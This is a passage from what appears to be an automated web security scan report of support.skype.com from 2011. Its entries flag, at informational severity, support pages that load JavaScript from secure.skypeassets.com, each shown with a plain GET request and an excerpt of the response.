<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.491. https://support.skype.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:41 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 63182


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user guid
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.492. https://support.skype.com/en/category/BANK_TRANSFERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/BANK_TRANSFERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/BANK_TRANSFERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51315


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.493. https://support.skype.com/en/category/BIZ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/BIZ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/BIZ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:46 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.494. https://support.skype.com/en/category/CALL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/CALL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/CALL HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 44003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.495. https://support.skype.com/en/category/CREDIT_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/CREDIT_CARDS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/CREDIT_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:01 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50457


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.496. https://support.skype.com/en/category/GIFT_CERTIFICATES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/GIFT_CERTIFICATES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/GIFT_CERTIFICATES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:04 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 46746


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.497. https://support.skype.com/en/category/GIROPAY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/GIROPAY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/GIROPAY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47750


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.498. https://support.skype.com/en/category/MESSAGING  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/MESSAGING

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/MESSAGING HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:34 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.499. https://support.skype.com/en/category/MONEYBOOKERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/MONEYBOOKERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/MONEYBOOKERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:05 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47737


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.500. https://support.skype.com/en/category/PAY  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAY

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/PAY HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:37 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.501. https://support.skype.com/en/category/PAYMENT_PRICES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAYMENT_PRICES/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/PAYMENT_PRICES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52082


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.502. https://support.skype.com/en/category/PAYPAL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAYPAL/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/PAYPAL/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47711


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.503. https://support.skype.com/en/category/PAYSAFECARD/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PAYSAFECARD/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/PAYSAFECARD/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47769


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.504. https://support.skype.com/en/category/PREPAID_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PREPAID_CARDS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/PREPAID_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47302


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.505. https://support.skype.com/en/category/PRIVACY__SECURITY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PRIVACY__SECURITY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/PRIVACY__SECURITY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52362


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.506. https://support.skype.com/en/category/PROD  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/PROD

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/PROD HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.507. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/SKYPE_FOR_YOUR_MOBILE

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/SKYPE_FOR_YOUR_MOBILE HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:46 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.508. https://support.skype.com/en/category/SUBSCRIPTIONS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/SUBSCRIPTIONS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/SUBSCRIPTIONS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:32:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51921


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.509. https://support.skype.com/en/category/TECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/TECH

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/TECH HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:45 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.510. https://support.skype.com/en/category/TS_ACCOUNT/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/TS_ACCOUNT/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/TS_ACCOUNT/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:57 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52140


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.511. https://support.skype.com/en/category/UKASH/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/UKASH/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/UKASH/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:31:22 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47735


<!DOCTYPE html>


<html lang="en" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.512. https://support.skype.com/en/category/VID_CALL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/VID_CALL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/VID_CALL HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.513. https://support.skype.com/en/category/VOUCHERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en/category/VOUCHERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/category/VOUCHERS/ HTTP/1.1
